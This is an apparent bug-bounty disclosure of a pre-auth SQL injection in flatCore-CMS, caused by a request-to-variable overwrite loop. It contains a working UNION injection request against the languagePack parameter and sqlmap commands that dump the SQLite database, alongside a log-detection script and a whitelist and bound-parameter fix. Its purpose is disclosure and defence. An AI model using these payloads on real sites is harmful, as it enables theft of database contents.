SQL Injection in flatcore/flatcore-cms
Reported on Oct 14th 2021
Pre-Auth SQL injection
Description
flatCore-CMS is vulnerable to a variable-overwrite vulnerability (every request parameter is turned into a PHP variable with `$$key`), which leads to a pre-auth SQL injection reachable through index.php.
Source code 1, at index.php#L41:
```php
$fc_prefs = fc_get_preferences();
$languagePack = $fc_prefs['prefs_default_language'];
$_SESSION['fc_admin_helpers'] = array();
/* all requests -> strip_tags */
foreach($_REQUEST as $key => $val) {
    $$key = strip_tags($val); // [Here] the request key becomes a variable name, so any variable can be overwritten
}
```
One variable at risk is `$languagePack`, used at core/functions/func_get_content.php#L72:
```php
function fc_get_content($page, $mode = 'p') {
    // ...
    $nav_sql_filter = "WHERE page_language = '$languagePack' "; // #sink 1: attacker-controlled value interpolated into SQL
    if(empty($_SESSION['user_class']) && $_SESSION['user_class'] != 'administrator') {
        $nav_sql_filter = "WHERE page_status != 'draft' AND page_status != 'ghost' AND page_language = '$languagePack'";
    }
    $nav_sql = "SELECT page_id, page_classes, page_hash, page_language, page_linkname, page_permalink, page_target, page_title, page_sort, page_status
                FROM fc_pages $nav_sql_filter ORDER BY page_sort DESC"; // #sink 2
    $fc_nav = $db_content->query("$nav_sql")->fetchAll(); // #sink 3: pre-auth SQL injection
    $fc_nav = fc_array_multisort($fc_nav, 'page_language', SORT_ASC, 'page_sort', SORT_ASC, SORT_NATURAL);
```
So a GET request can overwrite any variable assigned before L41 of index.php, or initialise any variable that is only read in the code that follows. Example request:
```http
GET /index.php?languagePack=1'+UNION+ALL+SELECT+'qzjpq'||'ikrHVivunFGyvagepQjdSdkaxMiRhlDxipFBXDmC'||'qzqjq',33,33,33,33,33,33,33,33,33--+SFpC+ HTTP/1.1
Host: flatcore
```
HTTP response:
```http
HTTP/1.1 404 Not Found
Date: Thu, 14 Oct 2021 13:16:13 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=7sne75a8nsrr21n6aroit7in42; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 6407

<!DOCTYPE html>
<html lang="1' UNION ALL SELECT 'qzjpq'||'ikrHVivunFGyvagepQjdSdkaxMiRhlDxipFBXDmC'||'qzqjq',33,33,33,33,33,33,33,33,33-- SFpC ">
...
```
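The injected value is reflected verbatim in the `lang` attribute above, and the same value ends up in the web server's access log. The following detector is an added example, not part of the original report or of flatCore: it parses constructed Apache combined-format log lines, URL-decodes the query string the way PHP would, and flags requests whose `languagePack` value is not shaped like a language tag or whose parameters carry SQL keywords after a quote. The language-tag pattern and the sample log lines are assumptions made for the example.

```php
<?php
// Added example (not flatCore's code): flag the report's request pattern in
// Apache combined-format access logs. Log lines below are constructed.
declare(strict_types=1);

$logLines = [
    '10.0.0.5 - - [14/Oct/2021:13:15:50 +0000] "GET /index.php?page=home HTTP/1.1" 200 6407 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [14/Oct/2021:13:15:58 +0000] "GET /index.php?languagePack=de HTTP/1.1" 200 6391 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [14/Oct/2021:13:16:13 +0000] "GET /index.php?languagePack=1%27+UNION+ALL+SELECT+%27qzjpq%27,33,33--+SFpC+ HTTP/1.1" 404 6407 "-" "sqlmap/1.5"',
];

/**
 * Returns suspicious findings as [line index => reason].
 * Check 1: languagePack must look like a language tag ("en", "de-DE"); this
 *          pattern is an assumption, adjust it to the languages the site serves.
 * Check 2: because index.php turns every parameter into a variable, any
 *          parameter value that carries a quote followed by UNION/SELECT is
 *          reported, whatever its name.
 */
function detectLanguagePackAbuse(array $lines): array
{
    $findings = [];
    foreach ($lines as $i => $line) {
        // Request target sits in the quoted request field of the combined format.
        if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $query = parse_url($m[1], PHP_URL_QUERY);
        if ($query === null || $query === false) {
            continue;
        }
        parse_str($query, $params); // percent-decodes and turns '+' into space, as PHP does for $_GET

        if (isset($params['languagePack'])) {
            $value = (string) $params['languagePack'];
            if (!preg_match('/^[a-z]{2,3}(-[A-Za-z]{2,4})?$/', $value)) {
                $findings[$i] = 'languagePack is not a language tag: ' . $value;
                continue;
            }
        }
        foreach ($params as $name => $value) {
            if (is_string($value) && preg_match('/[\'"].*\b(?:UNION|SELECT)\b/i', $value)) {
                $findings[$i] = "SQL keyword after a quote in parameter '{$name}': {$value}";
                break;
            }
        }
    }
    return $findings;
}

foreach (detectLanguagePackAbuse($logLines) as $i => $reason) {
    printf("line %d: %s\n", $i + 1, $reason);
}
// With the constructed lines above only line 3 is reported.
```

The first two lines pass (no `languagePack`, and a plain `de`), the third is reported by check 1; check 2 is the broader net for the other variables the `$$key` loop exposes.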
Proof of Concept
sqlmap can be used to confirm and exploit this vulnerability automatically:
```shell
# PoC
sqlmap -u http://flatcore/index.php?languagePack=1 --dbms=SQLite --ignore-code 404 --dbs --batch
# EXP
python sqlmap.py -u http://flatcore/index.php?languagePack=1 --dbms=SQLite --ignore-code 404 --dbs --hex --tables --batch
```
Impact
This vulnerability allows dumping all data in the SQLite database (i.e. content/SQLite/content.sqlite3). Since the root cause is the variable overwrite, an attacker may use the same primitive to exploit other database queries.
sqlmap output:
```
[21:31:02] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=hhsrdnvg04u...qk9f7th4g9'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: languagePack (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: languagePack=1' UNION ALL SELECT 'qzjpq'||'ikrHVivunFGyvagepQjdSdkaxMiRhlDxipFBXDmC'||'qzqjq',33,33,33,33,33,33,33,33,33-- SFpC
---
[21:31:02] [INFO] testing SQLite
[21:31:02] [WARNING] there was a problem decoding value '1' from expected hexadecimal form
[21:31:02] [INFO] confirming SQLite
[21:31:02] [INFO] actively fingerprinting SQLite
[21:31:02] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[21:31:02] [WARNING] on SQLite it is not possible to enumerate databases (use only '--tables')
[21:31:02] [INFO] fetching tables for database: 'SQLite_masterdb'
Database: SQLite_masterdb
[11 tables]
+----------------+
| fc_addons      |
| fc_categories  |
| fc_comments    |
| fc_feeds       |
| fc_labels      |
| fc_media       |
| fc_pages       |
| fc_pages_cache |
| fc_preferences |
| fc_textlib     |
| fc_themes      |
+----------------+
```
Recommended fix
- Maintain a whitelist of the parameter names that the `$$key` loop may import from `$_REQUEST`, so request parameters can no longer overwrite application variables such as `$languagePack`.
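The following script is an added example and not flatCore's own code: it reproduces the root cause on a constructed request (a `languagePack` parameter silently replacing the configured default), shows the whitelist the recommended fix describes, and additionally replaces the string-built navigation filter with a bound parameter so the value can no longer change the query even if it were to slip through. The table is a constructed subset of `fc_pages` containing only the columns the report's query names, created in an in-memory SQLite database through PDO; the helper `fc_nav_pages()` and the allowed-key list are assumptions made for the example.

```php
<?php
// Added example (not flatCore's code). Requires PHP with the PDO sqlite driver.
declare(strict_types=1);

/* --- 1. The overwrite pattern from index.php, on a constructed request --- */
$languagePack = 'en';                                   // normally taken from fc_preferences
$request = ['languagePack' => 'de', 'page' => 'home'];  // constructed stand-in for $_REQUEST

foreach ($request as $key => $val) {
    $$key = strip_tags($val);                           // every request key becomes a variable
}
echo "after the variable-variable loop: languagePack = {$languagePack}\n"; // 'de', not 'en'

/* --- 2. Whitelisted variant: only expected parameter names are imported --- */
$languagePack = 'en';
$allowedKeys = ['page', 'mode'];                        // assumption: the names index.php really expects
foreach ($request as $key => $val) {
    if (!in_array($key, $allowedKeys, true)) {
        continue;                                       // unknown parameter: ignored, nothing overwritten
    }
    $$key = strip_tags((string) $val);
}
echo "after the whitelisted loop:       languagePack = {$languagePack}\n"; // still 'en'

/* --- 3. The navigation query with a bound parameter instead of interpolation --- */
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE fc_pages (page_id INTEGER PRIMARY KEY, page_title TEXT,
           page_language TEXT, page_status TEXT, page_sort INTEGER)');
$db->exec("INSERT INTO fc_pages (page_title, page_language, page_status, page_sort) VALUES
           ('Home', 'en', 'public', 1), ('Entwurf', 'de', 'draft', 2), ('Start', 'de', 'public', 3)");

// Hypothetical replacement for the sink in fc_get_content(): the language value is
// bound, so a quote inside it is data and never SQL; the status filter is a fixed string.
function fc_nav_pages(PDO $db, string $languagePack, bool $isAdmin): array
{
    $sql = 'SELECT page_id, page_title, page_language, page_status, page_sort
            FROM fc_pages WHERE page_language = :lang';
    if (!$isAdmin) {
        $sql .= " AND page_status != 'draft' AND page_status != 'ghost'";
    }
    $sql .= ' ORDER BY page_sort DESC';
    $stmt = $db->prepare($sql);
    $stmt->execute([':lang' => $languagePack]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Normal input: one public German page for a visitor, two pages for an administrator.
printf("visitor, de: %d row(s)\n", count(fc_nav_pages($db, 'de', false)));   // 1
printf("admin,   de: %d row(s)\n", count(fc_nav_pages($db, 'de', true)));    // 2

// The report's kind of input is treated as a literal language name and matches nothing.
$hostile = "1' UNION ALL SELECT 1,2,3,4,5--";
printf("visitor, injected value: %d row(s)\n", count(fc_nav_pages($db, $hostile, false))); // 0
```

The whitelist closes the overwrite, and the bound parameter closes the sink; applying both is the usual choice, because the second protects the query even when a future change to index.php reintroduces an unexpected variable.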
Occurrences
index.php L41
Sure! 🙌
@maintainer - can you confirm that you are happy for a CVE to be assigned here as well?